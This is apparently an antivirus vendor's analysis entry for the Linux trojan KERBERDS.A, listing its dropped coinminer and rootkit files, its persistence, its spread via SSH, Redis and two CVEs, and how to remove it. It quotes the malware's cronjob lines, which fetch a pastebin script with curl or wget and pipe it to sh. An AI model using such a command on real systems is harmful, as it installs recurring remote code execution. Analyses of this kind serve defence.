Trojan.Linux.KERBERDS.A
Trojan.Linux.Coinminer (Ikarus)
Linux
Threat Type: Trojan
Destructiveness: No
Encrypted: Yes
In the wild: Yes
OVERVIEW
Downloaded from the Internet
This malware is responsible for dropping the cryptocurrency miner Coinminer.Linux.MALXMR.UWEJI and its rootkit component. It also has multiple ways of propagating itself, spreading via SSH and exploiting CVE-2019-1003001 and CVE-2019-1003000.
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
TECHNICAL DETAILS
2900788 bytes
ELF
Yes
25 Apr 2019
Connects to URLs/IPs, Drops files
Arrival Details
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Installation
This Trojan drops the following copies of itself into the affected system:
- /usr/local/bin/kerberods
- /usr/libexec/tmp/kerberods
- /usr/bin/kerberods
- /tmp/kerberods
It drops the following files:
- /usr/local/lib/{random}.c (source code of rootkit)
- /tmp/khugepageds - detected as Coinminer.Linux.MALXMR.UWEJI
- /usr/local/lib/{random}.so (compiled executable of the source code) - detected as Rootkit.Linux.KERBERDS.A
It adds the following processes:
- /tmp/khugepageds
- /usr/local/lib/{random}.so
Other System Modifications
This Trojan modifies the following file(s):
- /etc/hosts
It deletes the following files:
- /usr/local/bin/kerberods
- /usr/libexec/tmp/kerberods
- /usr/bin/kerberods
- /tmp/kerberods
- /etc/ld.so.preload
Other Details
This Trojan connects to the following URL(s) to get the affected system's IP address:
- https://ident.me
It does the following:
- It connects to the following URLs:
- https://pastebin.com/raw/{BLOCKED}1u (contains string to be appended in pastebin url in created cronjobs)
- https://pastebin.com/raw/{BLOCKED}6H (checks for update)
- https://pastebin.com/raw/{BLOCKED}iX (the complete URL in cronjob as of this writing)
- https://pastebin.com/raw/{BLOCKED}cb (shell script to be downloaded and executed in vulnerable devices)
- Terminates the following processes:
- named as "khugepageds"
- CPU usage is more than 80%
- Installs GCC in the system to compile the source code of the rootkit, then execute it.
- It creates the following services to enable automatic execution of itself:
- /etc/init.d/netdns
- /usr/lib/systemd/system/netdns.service
- Creates the following cronjob to enable automatic execution of a shell script found in pastebin every 10 minutes:
- Path: /etc/cron.d/root
- Content: */10 * * * * root (curl -fsSL https://pastebin.com/raw/{string from pastebin}||wget -q -O- https://pastebin.com/raw/{string from pastebin})|sh
- Creates the following cronjobs to enable automatic execution of a shell script found in pastebin every 15 minutes:
- Paths:
- /var/spool/cron/root
- /var/spool/cron/crontabs/root
- Content: */15 * * * * (curl -fsSL https://pastebin.com/raw/{string from pastebin}||wget -q -O- https://pastebin.com/raw/{string from pastebin})|sh
- Paths:
- It may spread to other devices:
- by taking advantage of the following vulnerabilities:
- over SSH network
- It tries to access Redis servers in order to compromise it
SOLUTION
9.850
14.970.05
25 Apr 2019
14.971.00
26 Apr 2019
Scan your computer with your Trend Micro product to delete files detected as Trojan.Linux.KERBERDS.A. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:
Did this description help? Tell us how we did.